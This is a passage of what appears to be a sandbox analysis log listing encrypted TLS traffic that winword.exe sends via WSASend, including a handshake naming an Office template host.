  345. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00f\\x10\\x00\\x00ba\\x04\\xb5\\x1a>\\xbbl\\x19\\xc8\\xee\\x0e!\\xcd\\xf5\\xe2\\xc0\\x98\\x1e\\xff\\xb6\\xff\\x80\nk\\x85\ncj\\x8f>\\xc8y\\x86\\x9db\n\\xee-\\x885\\xc9\\xb0xw\\x8aw~!\\x16\\x89\\xed\\xf32\\x8e\\xae\\xa3a\\xeb\\x17h\\xbc\t\\x02\\x19 \\x14\\x03\\x01\\x00\\x01\\x01\\x16\\x03\\x01\\x000\\xb4\\xde,d\r\\xd53i\\x08\\x9fe\\xb8\\xe1!\\xb9\\xbf\\xd1\\xe3\\xb5\\x8e|\\xcfb\\xb6o0\\xc0\\x10;\\x9dy\\xd4\\xc7\\x9b\\x0fu\\x141\\x1fa\\x17\\x1a\\x11\\x1cj\\xed?\\x9f"
  348. "http_request": "winword.exe_WSASend_\\x17\\x03\\x01\\x010\\x9f\\xce\\xe7\\x87\\x19\\xcbp\\x00\\x8c\\xfb9\\xf0\\x93\\xa5\\x95\\xc7\\xe7\\x8a\\x11\\xf7\\xb7\\xfel\\x94\\xdc\\x94\\xc7\\x07\\xe7\\x83\\xd2\\x0e\\xe9\\xf5\\xdc\\xbdx\\x16\\x03\\x0f:\\xe2\\x85\\xb8j\\xfb'sw\\xd1n\\xc7\\x16i\\x81\"gi\\x1ch\\xb82\\xa3*\\x98\\xe1p\\xc5\\xa1\\xe1\\xa3\\xae\\xf6%\\x1a\\x16\\xb5dj\\xfe\\x1d\\x8e\r,!+\\xb7=)\\xbe\\xe6\\xd0\\xe1nc\\x98\\xabc\\x92\\x9a\\xa3\\x19h\\x8bb\\x10\\x07\\xb5\\xd8\\x8f\\x8d\\xcd\\xb5\\xd5d\\xf9\\x9c\\xdb\\xbcf`\\xdc~\\xef\\x1f\\x14\\xe4\\xc2\\x0e\r\rvw\\x80al\r)\\x19v\\xf1\\x13\\xbe-\\xc6\\x92\\xfa \\x8bh\\xd8l\\xe12q\\xad\\x89fe\\xad_e\\xf1\\xa1\\xe1\\xa1\\xa5\\xca\\xd3\\xf5o\\xcen\\xef\\xde$q\\xb1\\xf1\\x86y\\xf3\\xc1\\x0c\\xbe\\x08;\\x13\\xab\\x1a\\xda\\x08\\x00\\xcb\\x04\\xc9\\x83|\\xf7\\xca\\x98\\xd2\\xae\\x1f\\xac\\x00\\x9a\\x10_m\\xa2\\xa4\\xd6\\xe0\\xa1\\x16\\x9c\\xaekdf`~\\xd3\\xe4/y\\xdd\\x8e\\x06\\x9e\\x9a1\\x02\\xf9t\\x85\\xd1_\\xe7~o\\xa7"
  351. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00f\\x10\\x00\\x00ba\\x04\\xd2\r\\xdc\\xdc\\xf1|\\\\xbc\\x07?7\\xa6\\xba\\x80\\xcc\\xd2\\xd7#an\\x8fp\\xc3\\xac\\xaf\\xc2e\\x06\\xc0?s\\xc6e*v\\x97\\xe6\\x93\\xb9:p&\\xce\\x04\\xba\\x9c\\x7f\\xca\\x08b\\xed\\xb6u\\xaan\\xee\\xc2\\xeb\\xbd\\xf9 d\\x1d\\x8c\\x14\\x03\\x01\\x00\\x01\\x01\\x16\\x03\\x01\\x000\t\\x89\\xd7\\xad@\\xa3tw7\\xfb\\xca\\xda\\xe5y9\\xa56/\\xf0\\x92\\x86e\\xc7d\\xfc\\xac\\xd7\\xb1n\\x80;\\xf6\\x89q.\\x1e\\xe1\\x14\\x1d\\xc9\\xe7!\\x16\\xc7\\x08\\xa9"
  354. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00f\\x10\\x00\\x00ba\\x04e\\xceik\\xc2\\x8c\\xfc\\x97\\xa8\\xb9\\x82\\xf4\\x1f\\xe2h\\xbb\\xae7\\x8b\\x10|\\xbc\\x14\\x95\\xea\\x04\\xb2c\\xebi\\x935\\x1a\\xf2^\\xcax\\x93\\x9er\\xb6c\\x89\\xa3\\xc3\\xe0\\x00\\xafo\\xf21vt\\x92hd8\\x9e\\xe7a\\xd8\\xbb\\x14\\x03\\x01\\x00\\x01\\x01\\x16\\x03\\x01\\x000\\x80\\xe3o\\x12h\\xec%c\\xb1\\x1c_\\xabmc\\x83\\xd1iu,\\x1f\\x00>?\\x00!\\xaf\\x91\\x8b\\xa2\\x022\\xdcl\\xec\\xbbc\\xf3\\x0fi\\xb3\\xf5,\\xbe\\xe2\\x89\\x86-"
  357. "http_request": "winword.exe_WSASend_\\x17\\x03\\x01\\x010\\xe1\\xd4\\xce61af\\x88\\x8d1\\xa1\\xdaz\\xb9\\x82o\\x86q\\xe3\\xcc\\x01\\xa9p$\\xe7-\r<\\\\x97\\x99\\xad\\xe7\\xa5\\xa2\\x0b\\x92\\xc6\\xbe\\xe5\\xf2\\x96\\xf6\\x9d\\x90\\xec\\xdd\\x0cq\\xf6\\x9e\\xa5g\\xd3&\\x82d\\x81\\xfc\\xe8e\\x0c\\x1a\\x82\\xad7\\xcb\\x12\\xdd>\\x10\\x1b\\xe4\\xe7r\\x00\\x9e\\xd5f\\xb3%e\\xb6\\xe4\\xd7\\x1d\\x98\\xe4\\xc2s\\xcd\\x85\\xc0\\xbd\\x94w\\xae\\xfd\\xfdbq\\xd2\\x96\\x94\\x10\\x0f,\\xdc^\\xae\\x81,h\\xd4\\xeell\\x08;z|jwf\\xda\\x8d\\xdf\\xca\\xdc\\xca4i\\xefu\\xf1\\xc8\\xa84c\\xd9\\xcdvy4e\\x8d\\x10\\xb0\\x08\\xd7\\xbb~\\xdcf\\x86\\x86\\x8b\\x8d\\x96\\x1f\\xd5\\xc7bfi\\x00:5\\xd7\\x19\\x95\\xact\\x11\\x13\\x1e\\x83i\\xd5z\\xcb\\xec\\xe0\\xe10\\xc7\\xd1\\x97/f\\xdd\\xf6\\\\xc5\\xf2<x\\xb6t\\xff\\x045\\xdfu\\xb4\\xc6\\?\\\r-\\x8b\\xe8\\xfd8i\\x02\\xe6\\x9e\\xe8vu\\xd1\\xd4$ho\\xc1\\x88\\x8a\\x1bm)\\x80d\\xa001\\xf9\\x1c\\xf06\\x0c\\x9e\\xf4x\\xc7\\xeah"
  360. "http_request": "winword.exe_WSASend_\\x17\\x03\\x01\\x010i\\x1b\\xf4<\\xe6+k\\xc1\\xbb\\x12\\xf4\\xcf\\x16\\xdf\\xf9c\\xda\\x80\\xf3\\xc5\\xc6;\\xc3\\xcb\\xa6\\xea\\x995q\\x8a\\xa9\\xc0\\x1e\\xa6\\xb9h-\\x9d\\xb85\\x19(\\x8c\\xfd2d\\xf6\\x022\\xe5\\xbb\\x920<\\x0e\\xedt\\x97\\x16\\xd4\\x12\\xf0\\xa9&\\xeb\\xb0b\\xc6\\xe4\\xc1\\xd8\\xe4\\xcc\\xa9\\xa22\\x7fg\\xcbx\\x0e\\xc7\\x89\\xb6m\\x8a \\xf4`mecy\\xe3v\\x8co\\xb4\\xfc\\x19\\xe8\\xaao\\xc8+y\\xe6d\\xdb\\xc11\\xa5\\xf8\\x98\\xabp\\x98\\xea\\xbd=\\x946\\xda0\\xe6^\\xed\\xc2\\xc4m\\xdfum\\xaa\\xb0\\xe8\\xcf\\xd8p\\xe6z\\xa6\\x0bqj~\\xb1<\\x00\\xec\\x85\\xf5n\\xa7j\\xdb\\xad\\x9c\\x01\\xfa\\xab\\xb3)\\xd0\\xc4w\\x98\\x07\\xc2~\\xf7\\xd0\\xd2\\x05+\\xa0n\\xb6l+\\xfap\\x80\\x96)\\xf8\\xef\\x0bn\\xca\\xd2\\xa8\\xee\\x184\\xe0\\xca\\x8d\\xb0#\\x8c#\\xb7|\\xba j-\"t\\xdazrj\\x02v\\xb7\\xb6\\xc0:d\\xf5;o\\x06)\\x9cv\\xa3)\\xdb\\xf0<\\x87\\xbf&\\xc5\\xc2wj\\xa6\\xae\\x9cr\\xf8\\xae"
  363. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00\\x83\\x01\\x00\\x00\\x7f\\x03\\x01x\\xee5\\x98u\\xc4\\xbd\\x9f\\xa6\\xfe\\x91 `\\xc1oe=k\\x80\\x8c\\x06b\\xcf\\x01g\\xf9\\xd2o\\x97g\\xef\\x00\\x00\\x18\\x00/\\x005\\x00\\x05\\x00\n\\xc0\\x13\\xc0\\x14\\xc0\t\\xc0\n\\x002\\x008\\x00\\x13\\x00\\x04\\x01\\x00\\x00>\\xff\\x01\\x00\\x01\\x00\\x00\\x00\\x00%\\x00#\\x00\\x00 omextemplates.content.office.net\\x00\n\\x00\\x06\\x00\\x04\\x00\\x17\\x00\\x18\\x00\\x0b\\x00\\x02\\x01\\x00"
  366. "http_request": "winword.exe_WSASend_\\x17\\x03\\x01\\x010\\x15\\xf2\\x1d\\xf8\\x9a\\xda\\xf5\\xe9?,\\xaa\\x05\\xff\\x97\\x1fk\\xb9\\x02\\xaf\\xc2\\xa7\\x15g\\x8ayc\\x83vw\\xca\\xc2\\xdad\\xfa\\x82\\x1b6\\xbc\\x93\\xd7l\\xa9!\\xc2v\\x1d\\xb4g\\x92\\x8e\\xbfl\\xbf~\\x01/r-\\xfe\\xed\\x13\\x95>\\x99\\xffz\\x0b\\xcfh\\xc6j\\x9c\\xd4\\x82\\xde\\x82\\xfe\\xdf\\x1f\\x164\\x00\\xf6\\xf2\\xe4\\xaf\\xd3t\\x85\\xf8\\x812\\xe5=\\xc4r\\xf0\\xcc\\x04\\xfa\\xa1q\\x16\\x8d,n\\x188~\\x0cx\\x0f\\xad\\xfe@\\xe4h\\xf3\\x89z\\xf4\\xf9\\xb0\\xbb\\xc6b2\\xba\\\\xf9\\xccc\\xbf\\xf2\\xc4e\\x05:\\x82\\x1e0\\x1a\"\\xbaf\\xa3>a\\x1a\\xe7pi\\x82\\xa3m\\xe7\\xa8\\xb21\n\\xe6\\x8fs\\xa4\\xc2\\xb7\\xd3i\\x91`\\xe8\\x8a\\xa9\\xab\\xecm\\xab\\xaa\\x0f\\x13i\\x8a6x\\x80\\xf2\\xab\\xbam^e~\\xaa\\xd8\\xf4\\xa6\\xce\\xf49\\x88\\xe4\\xc0;\\xaf\\x0c\\xc5_\\x8es\\x8d\\x15\\xcb\\x87\\x08w\\xeec\\xd4\\xc2\\x99\\xae\\x1d,\\xebi\\x0ep\\xe7bz<\\x87o`i\\xce\\xf0\\x11bjwe\\x0e\\xa3\\xdd\\xa2\\xca\\x9c"
  369. "http_request": "winword.exe_WSASend_\\x17\\x03\\x01\\x010\\xea\\x9f\\xba\\xcc\\xa0s\\xc0ux\\xa8z\\x0b\\xcc\\xc9u>\\xb5\\xf6\\xf4\\xeb\\x1e>\\x9f\\x88p\\xca\\xc6pf\\xe8\\xc9\\xcf5\\xa3\\xb0\\xa7^\\xd9?\\xda\\x90\\xe0\\xa3_e\\x1ay~@2\\xaat\\xb9\\xb7s\\xad%\\xbe\\xa0\\xbdg\\x13-\\x93\\xe0\\x84\\xeb\\xd02\\xe2k\\xc7\\xaah\\xa3b\\xcewv\\xb4\\xba\\xc5\\xd0a\\x86u\\x18\\xe4\\xc7?\\xe3&`\\x04\\xe3v\\xe5m\\xe6cd\\xebo\\x00s\\x8a\\xa0\\xa02\\x85\\xa9\\xf8\\xbe\\xe0;j\"\\xbd%\\x1e\r\\x8c~!\\xf6z\\xabe\\x1f\\xff\\x9c\\x93l\\xbf\\xce\\xdb,\\xd8\\x19\\xbd\\x8f\\xbb\\xebk^\\xcc\r\\xf8\\xdeb0\\xd0\\xb5\\xae\\x88\\xa3\\xe9\\x1e\\xbd\\x05\\x06\\x10y\\xb7?f\\xbb\\xde\\xd44\\xc9\\xcc\\xed\\x02\\xb7v\\xcd\\x08\\x94\\xf3\\xf8\\xf6\\x98>\\xee\\x0f8n\\xf6\\x15\\x81\\x8a\\xf4=,\r\\x98\r\\x81\\x86u\\xf52$g\\xde\\x1ads\\xb0\\xca\\x0b\\xf5\\x8d\\x847\t#\\x1fd\\xfb6\\x14`\\xfbz^`\\xf9\\x19\r\\x94\\xf0\\xae\\\\x00\\xf1n\\x9f\\x81\\x93j\\x92\\x87\\xf9)"
  372. "http_request": "winword.exe_WSASend_\\x17\\x03\\x01\\x010ws\\x01\\x8a\\xf3\\xd0\\xd1\\x19\\x8b\\x04f\\x0e\\xb2s\\x1c\\xfb\\xbcu\\xc2\\x18\\xd8\\xac\\xd4\\x82\\x01\\xe1\\x83\\x1b\\x8f\\xe9\\xdd|\\xfc\\xae\\xb5\\x85\\xe5\\xbc,\\xe4\\xab\\xde\\xcc\\xd7\\x81mt\\xbc\\xde.jgm\\xf0*g\\x17\\x12\\xfd a\\x9a;\\x8aqv\\x7f\\x89\\x8e\\x80\\xca9\\xc3\\x85\\x7fzla\\xc7\\xb7\\x87z\\xc8\\x9eg\"6`\\xfe\\x97\\xf9\\xfe\\x01:bq\\xfb\\x8bok\\xf0a\\xd0\\xc3\\xe3u\\xc8\\xc4\\xe6#\\xd7\\xcb\\xc7\\xfe'nb\\xeb\\xdd\\xab\\x1e\\x0bc\\xd6l\\xda\\xe58\\x04\\xcbs'\\xc6\\xc1\\x94=\\xe0\\xc8'\\x009r\\xa3\\xa1\\xab\\x18y\\x96>\\xbf\\xf1+\\xe5)\\x99\\xf1\\x8d\\x1d\\xe1|g\r\\xfa\\xbe\\xd6\\x91\\x045\\xc1\\x13\t\\xc2\\x0b\\x04\\xae;c\\xfcq\\xd9\"i \\xe1\\x047\\xd1_\\xac5\\xe0w\\x12\\x83\\xb6\\xdd\\x8a\\xdcz\\x10-\\xf7\\xf54\\xb9\\xc46u\\x8e\\xa2\\x18\\xec\\x9f\\xdf\\x91\\xbfs0d\\xdd\\x83\\xf7\\xb4n\\x91\\x95\\xe5\\x1a\\xda\\x96\\xbb\\x89\\x8fb\\xe2\\xe8\\xb1\\x8b\\xd0\\xe4\\x9c\\x11co\\x9bk"
  375. "http_request": "winword.exe_WSASend_\\x17\\x03\\x01\\x010\\xcb#'h.\\x92\\xc5\\xb8\\x0c\\xb0\\xb5\\xcb`\r;\\xd1o\\xb8q\\xd6\\xbf\\xcfh\\xb2\\xb3\\x11%\\xf3~\\xce\\xd4yv\\x8a\\xc1\\xec\tu\\xcc\\xab\\xed7\\xe9\\x1b\\xbat4\\xc0jb>`l\\xde\\x7f\\x04/\\x89koxe\\x1a\\xff,\\xc5\\xc3p\\xf6\\xd1\\x96\\xbd3\\xc12#\\xc3\\x1a/\\x80\\x14oo\\x90\\x8eg\\xba+.=\\x1e`\\x00aqhp\\x91eu \\xff\\xc7\\xd6\\xd2\\x9c!\\xa3\\xb2\\x16?'\\xc2\\xce\r\\xb4\\xf5\\xb3amj`\\xda6\\xbd\\xed|\\x98\\x9b\\xc0`\\xafe=3\\xd8hs<k3\\x8c`\\xbb\\x1f`\\xe4)\\xaa\\x84jk\\xd2\r\\x01$\\xd8<\\x07ba.\\xea\\x8ea\\x9c'\\xf8\\xcb\\x83\\x95v\\xb2\\x9b\\xb9\\x02 e\\xbf\\xb1\\x16\\xe4\\\\xec\\x9f4\\xbf\\xbc\\x87f(\\xc1\\xab0aq\\x9a\\x12.\\xb0u\\x19\\x9f\\xb4\\x893y\\x0b\\xfbl\\x0c\\x8e\\xbc\\xc5\\x16\\x89\\x00\\x8e\\xdd\\\\x96\\xc7y5,\\xda*\\xca\\x88w\\x11\\xa5\\xb6f\\xf6\\xba\\x18\\xba\\xde\\xe9\\xf2^\\x18\\x81\\xe7\\x18\\x17\\x08\\xdc"
  378. "http_request": "winword.exe_WSASend_\\x17\\x03\\x01\\x0108n\\x9ez\r\\xdbd$\\xfcw\\x0c\\xb9\\xaen\\xab\\x94vw9w\\xd3\\xd9\\x80\\x07\\xdcl\\xc1\\x07\\x97\\x98\\xbe\\x9ds\\xde2o\\x81r\\xca\\xe6v\\xber\\xad\\xfd\\xc1y:,\\xc5d\\xb2\\xde\\x03n3x-\\x83k\\xeb\\xfar5*\\xd9?\\xc6\\xc6\\xda\\x8d?\\xf1\\xc5\\x8b\\x8b\\xcdq.\\xdeu\\xb8\\xd4\\xe2$+\\xf6\\x8f4\\xfca\\xc8z(\\xc9-$\\xab\\xcf\\xbbchq\\xa0\\xf8\\xe1\\x10\\xdf\\xd2\\xce\\xd6\\xae\\xa6<\\x98-\\x0e\\xb2\\x98\\x1d\\x9aw\\xeb\\xfa0d\\x86\\xcf_\\xf5.v\\xcf9\\xd82\\xff\\xf6\\x80b\\x7f\\x0cw\\xfd5\\xbaeq\\xe3\\xc0\\xdb\\xb7\\x86\\xb58-s\\xee\\xfd\\xa8\\x8d\\xd0\\x9eu\\x9e\\xc7&\\xdfm#\\x12\\x8e\\xf5\\xbb\\xb5e\\x17\\xa9\\xe4\\x1ey\\xc6n\\xd5\\xd1\\xa24c,\\x948`\\xfb\\x1a<\r\\x0c\\xc9\\xf0\\xb0\\xc7\\xbc\\x1a\\xbap\\x05o\\x80a\\x8f+\\xd6\\xfe\\x82\t0\\xc5d\\xe8n\\xa9\\xcf2\\xa5\\x9b\\xa8z\\x97\\xd51\\xc9q\\xfa\\xb9\\x1b\\xac\\x03\\xe9\\x03\\x15%=8o\\xac\\x89\\xba\\x17v\\xa1"
  381. "http_request": "winword.exe_WSASend_\\x17\\x03\\x01\\x010\\xb1\\x98\\xaaq\\x95\\xb9@\\xa4\\x84ocy\\x06\\x0f\\xd8(\\xe9hi\\xbc\\xd6\\xa9\\xe0\ty\\x83\\xc1u\\xe9\\xc2k\\xf7\\xf0h\\xben\\x9a\\xb8\\xfc#f\\x0f\\xda\\xc3\\xb9\\x08a\\xed\\xfet\\x9a\\x8c\\x83\\xec\\x92\\x82\\xc3y\\x94l\\x03!+2\\x8d\\xec\\xb33\nk\\x0f\\x90\\xe2\\x9c\\xed3\\x83\\x84w\\xce\\xe5\\xba\\x06u\\x8c\\xca\\xf5\\x88\\xcb\\xb5\\xe0cg\\xa5\\x99\\xb0\\xd1\\xb5d\\xa6\\x85j\\xd0\\x8c\\xe5\\xb2\\x88\\xb2\\xb0\\x87$ \\xfco\\xae\\x0e\\x8c1\\xf0\\xb9\\xba\\xbd|\\x10\\xb4d\\xfeo\\xb84\\xfa\\xe0\\xec\\xc4\\xb8\\x88d\\x14%~\\xe1\\xden!\\xb9\\xd9\\xf4\\x15\\x9fz\\xca\\xa8)\\xca\\xbe\\xba\\xce7\\x9b&\\x83v\\xb6\\xa1\\xfa\\xa4kpj\\x190b)e\\x87\\xe8\\x93\\x18\\xf6\\x19\\xb8\\xd8g0kjpkvwz\\x0eb\\xa1mp\\xa8\\x1e\\xf7\\x01bgz\\xe0\\xdf\\xff\\x9b\\xa6\\xa1\\xf9\\x1a\\xc4\\x8a\\xa8\\xd5\\x8b\\x11\\xd8\\x17i\\x8f+\\x0c\\xaavh\\xde*tv\\xb1\\x91f\\xf8y\\x88\\xb8\\x8d\\x9b=\\xa21 a\\xf2\\xc4"
  384. "http_request": "winword.exe_WSASend_\\x17\\x03\\x01\\x010\\x05\\x98\\x8a\\xeb\\xcb^ h\\xaf\\x93!\\xa9\\x1f\\xe6\\xe1\\xca\\xa9/?\\xd2\\xe4\\x02\\x1c\\xc9\\x8d\\x9b\\xfe\\x99\\x93\\xf4\\x98zq`\\xa0\\xc5\\xce\\xb5\\x1ey1\\xa8dz\\xf4\\x9c\\xb2w\\xa3i>\\xcd+q\\xa53ii\\xf7\\xe1ber\\xf1\\xe7'y\\xceb*\\xbb\\xa4^\\xbe&\\xf1wc\\xd0|^\\x1eg8\\xcb+@\\xbe\\x16\\xe8^\\xbes\\xdcx\\x8a<c\\x8b\\xe2\\xc1\\xbf\\x0b\\xbd\\x19\\xce\\xb2\\xf6\\xcf\\x07\\x88\\xe7\\xc3\r\\x91\\xf2-\n\\xb9wq\t\\xd6*!\\x1c~\\xeay\\xd2\\xc7_\r ~c\\xb3\\x83\\x07e\\x8a\\xfcv*g(t\\xaf\\xbd\\xd7,eyy\\x93,\\x02ux\\xfcgc\\xb1\\xc7\\xbf\\x9b#m\\x04\\xe2\\x81\\xdc\\x96\\x14\\x03r\\xfd\\xe6\\x04\\x90p\\x92\\xc8t\\xc5\\xd4\\xe0&\\x15_\\xe3\\xbbf\\\\x80\\xe2\\x19\\xb9\\x06\\xd4\\x97\\xe7a\\x1e\\x10\\x87\\xd1ax\\xda\\xb9\\xcd\\xb0\\x9fq\\xe9\\xdab\\xfc\\x80\\x98pvx`1vt\\xa7\\x91:2d\\xf7>\\xe4r\\xd2\\x96\\x9c\\x90\\xf5\\xcdhh\\x02\\x90"
  387. "http_request": "winword.exe_WSASend_\\x17\\x03\\x01\\x010h\\xbc\\xae\\xcc\\xc23g\\xaa\\x01\\x1f\\x1a.q|\\x9a\\xebr#\\xfd\\x94w\\xfd\\xca\\x8e\\x8d~\\xc2\\xe1\\xaf/\\xff\\xdc\\xd4pm\\x94#\\xbb\\xc8w%qc\\xe5;\\x84\\xcazu\\xcd\\xce\\xb3s\\xed\\xbf\\xfe\\x10\\xe7\\x02y\\xda\\xd8d0\\x86\\x10\\xa7v\\xc7|\\x9fc\\x9a\\xb0hk>e\\xa7\\xab\\x89\\xdbhd\\xc5$\\x1by\\xb8\\xec\\xe3(\\xd4\\x9e\\xd2\\x85|\\xb6(q\\xf5\\x96d&\\x8fh\\xe5\\xef\\x9c\\x99\\xc2gr\\x1d\\x9d\\x81\\xbe\\x91\\xf4-yi\\xdf\\xf2\\xe6\\x91\\xf7k\\x0f\\xb1q7uj\\xf3v\\xd7\\xa3c\\x1e\\x96\\xe3\\xc0p\\xae\\x00\\xcd=\\x10\\xb7\\x85\\xd5\\xfd\\xfcoi\\x0e2\\x91\\xd1\\x07\\xf8\\xaf\\xf2\\xb05c\\xc2\\x0fkw\\xcd6\\x8a\\x8ct\\x9c%i\\x14\\xbe\\xb7l\\xf4\\xd9\\xa5\\xf7\\x05g\\x00\\xdbw=\\xf6\\xd5@k\\xc1\\xe6\\xdd\\xdb\\xba\\xcck\\x917b\\x94\\xe5\\x15o\\xd15e\\x81\\xd8\\xde\\xaex\\xdf\\xa6\\xac\\x913b\\xfe\\xd63\\xc9vuh\\\\x8eh\\x93\\xf3s\\xdbar\\xdb\\xf77"
  390. "http_request": "winword.exe_WSASend_\\x17\\x03\\x01\\x010\\x84\\xe5x\\x92\\x02 zf\\xa7\\x89b(o\\x9e \\xae\\x10't\\x81\t\\xa7q\\xbd\\x1af\\xa0\\xf7\\xf7\\x0f\\x12f\\xe3h\\xab\\xbb\\x04\\xc3\\xb5\\x118\\x8et\\xb8\\x0c\\x1b\\xe2\\\\x91^\\xfas\r0\\xe7\\xf8z|o\\xb0\\x9f\\xdd\\xe8%g\\x1e\\x86\\xf7\\xb7\\xa7\\xe1\\x1b1\\x1d\\xbf\\xe3*\\x0bt\\xc0o\\xceb\\xd3j\\x88\\xe0\\x01sp2\\x9eh\\x1f\\xcc\\xb2@\\x9e\rh\\xadd8;\\x99\\x99\\xa3ff\\xd1+\\xb1\\xc1\t\\x1c\\xa2\\x991\\xe3!q\\xdd\\xcc\\xbcg\\xb0\\xb1\\x1b\\xfc\\xf6\\xa2\\x84\\x8f\\xe1\\xd7^/\\xb8\\xc2\\x07\\xa1fl`\\x10\"v\\xe2\\x94\\x8f\\x06\\x1f\\xfa?y\\xbf\\xa98\\xb6\\x87\\xcf\\xd3\\xb4q\\xe1v\\xc6bx\\xff\\xb6\\xca\\xaa\\x13\\x17\\x1a\\xdf\\xe8\\x12h\\xb7\\xce(\\xdavi\\xed\\x12\\xd0\\xe0\\x12\\xb7\\x15$iw\\xaa=mx;p\\x10q\\x98r\\x18wbbd\\x01\\x81\\x0e7\\xe5\\xef\\xb9\\xd9?\\x9d\\x0cw\\xc5\\xaa\\x90fwo;\\xa7nf\\xf8q\\x7f\\x19\\xec\\x0f\\x0b\\x93\\xbflos\\xd3"
  393. "http_request": "winword.exe_WSASend_\\x17\\x03\\x01\\x010\\xdf\\x17(\\xf5j\"er>q\\xfe\\x92i\\xfc\\xe2@\\xf0\\xc6p\\xab\\x82\\xb9\\\\xa4\\x1f\\xdf\\xfc\\x10\\x8e\\xf8\\x84`r\\xed\\x1b\\xc8k\\xbe+\\x98\\xc3\\x9a\\xd2\\xcf\\x00\\x82\\xa4\\xed$\\xb3\\xb4\\xc0\\x80\\x80wm\"\\xc3w-\\xea\\x8d|\t\\xc8d5\\x91\\xf8\\xed\\xb5\\xe0\\xed\\x18t\\xe1\\0#z\\xabw\\x84\\xa5\\x8e\\xfc\\xf8\\x82\\xe4\\x84\\x95\\xf5\\x19\\xaf\\xd0i\\xfc\\xbf\\xf5q\\x08\\x0c\\xb7^\\x1da=k@a\\xfa\ro8ux\\xdf\\x04\\x8cf\\x13\\xcbo,\\x13\\xb9\\x1a2x\\xc9%\\xa9\\xf8\\x96\\x90p\\xeb\\xf1z\\x17o\\xaf\\x1e\\xe0c\\x88\\xdc\\x84/\\x95/e\\x1d\\xf4\\x83\\x0c\\xd4_b\\xc2\\xdd>\\xa9+&>\\x9en@0s\\xcb\\x8d\\x8a\\xfd\\x97\\xaa@\\xd8\\xe38\\xb3s\\x8e\\xb0:\\xe4\\xf47o\\xd3\\x1c\\x19\\xb5\\xab\\xf3\\x1e\\x01t\\x0b\\xab\\x1di\\xb5,\\x86\\xa1>\\x90o\\xff\\xab\\x8f-\\xf2\\xc21q#\\xddhwm\\x07\\xf8\\x1f\\x99\\xd5y\\x02\\x8c\\xe0b\\x8a\\xa4*\\xfb *\\xc5\\x156\t\\x8c\\x04\\x7f*\\x90"
  396. "http_request": "winword.exe_WSASend_\\x17\\x03\\x01\\x010,!\\xef\\xcc\\xff\"\\x9b\\x1f\\xa9\\xde\\xa8\\xa0\\xab\\x0bhr\\x88@\\x8f&u\\xa0\\xa3;\\xf5\\x86\\xe4\\x92\\xcbg\\x87\\xf8q\\xad\\x054w\\x93\\x12/\\xbb@\\xca\\xb7v\\xba\\x03g\\xc3\\xdc5\\xf6\\x14;\\xff\r\\xf0\\xd9\\x86l\\x19\\xf4\\xe7\\x97\\x02\\x99\\xbd\\xd3\\xaf\\xa5\\xf8\\xee\\x00\\xb9\\xac\\x83\\xde\\x80x\\x9b\\x1c0\\x1c\\x1f\\xdco\\xb1w\\xeel\\x99%czk\\xd5f\"e\\x0b\\xe1q%\\x02%c\\xdai\\x0ba\\xed\\xa1.\\x84\\xc1\\xa6<\\xb9\\xdf\\xfd\\x91\\xc150'c'\\xe3y\\xef!7w\\xccm\\xc6\\x82:\\x06\n\\xbcb1\\xdf\\xfc\\xdc\\xc6\\x17\\xcej\\xf0c\\xa4\\xc8\\xd2\\xda&\\xbc\\x97\\x8ci\\xb2\\xbe\\xf5\\xb86\\xfc\\xdf7d\\x8e\\xa3\\x0c\\x93\\x96\\xd7\\xa0\\xcb~\\xd8\\x9b\\x11\\x99\\x9dp6\\x1d\\xbd3\\xef\\xa3\\x06\\xf5 \\x8d\\xcam\\x8b\\xce\\x91\\xc1e\\xa2bcjo\\xfd\\x8b\\xa5\\xfc\\xb8\\x10u~f\\xbad0\\xa9v\\xd9@\\x13\\xd6\\xb9\\xbe\\xd3\\xce \\\\x8c\\xe5\\xd5\\xf5w\\xd5\\x1a\\xfd/\\xf1&x\\x04r\\xf5\\xd8\\xd0\\xbc\\xba"
  399. "http_request": "winword.exe_WSASend_\\x17\\x03\\x01\\x010y\\xabo\\xb7wj=d\\xacr\\xe5\\xde4\\x03m\\xcd\\x10l\\xc7\\xf1\\x01\\x8f\\x12\\xc3\\xf1m\\xddl\\x0fr\\xce\\xcc\\x96\\xc1\\x02upu;;t\\xa53\\xf2'_\\xc2\\x1a\\x03v\\x1f\\xd0\\xce\\xfd\\x10\\xd9\\xf4\\x1er\\x07\\xf3bp\t\\xda \\xc8\\xf2\\xdc\\x13\\xfb`y\\x93\\x9b0y2\\xc8r\\x13\\xe0\\xc0n\\x8d\\xa361/\\xa2m\\xf5w\\x7f\\xf9og\\xe6y\\x96gb\\x93=\\x1aw\\xb6\\xa9\\xc6\\x19\\xf2=\\xe9\\xd1w*\\x00\\x8e\\xd1\\x9ep\\xa6\\xbe\\x10|\\x1c\\x9d\\xefu\\xb0\\x111\\x9b\\xb1\\x94\\xc4:t\\xcdl\\x1dx\r\\x93:\\xbc`:\\xd9\\xac\\xb1\\xa4\\xd4:i\\xc9c\\xd8\\x19y\"k>\\x83\\x8d\\x81i_\\xc8\\xec\\xb2%-\\x0e`\\x12fm\\x11\\x1dkh\\x92\\xec\\x83\\x0f\\x849\\x818\\xbf\\x00\\x18\\xb3d\\xc0\\x19\\x11&\\xef\\xdb8\\xd0\\xfb\\xe3g\\xca&!\\xd5+\\x1d\\x9f\\xaab&\\xb3\\xcf\\xb6f\\xed\\xc1\\xa1\\xe8\\xa4w\\xbc\\x14\\xdek\\xf7\\xa1m$\\xf32@y#\\x83\\x8d\\x7f\\xb8~"
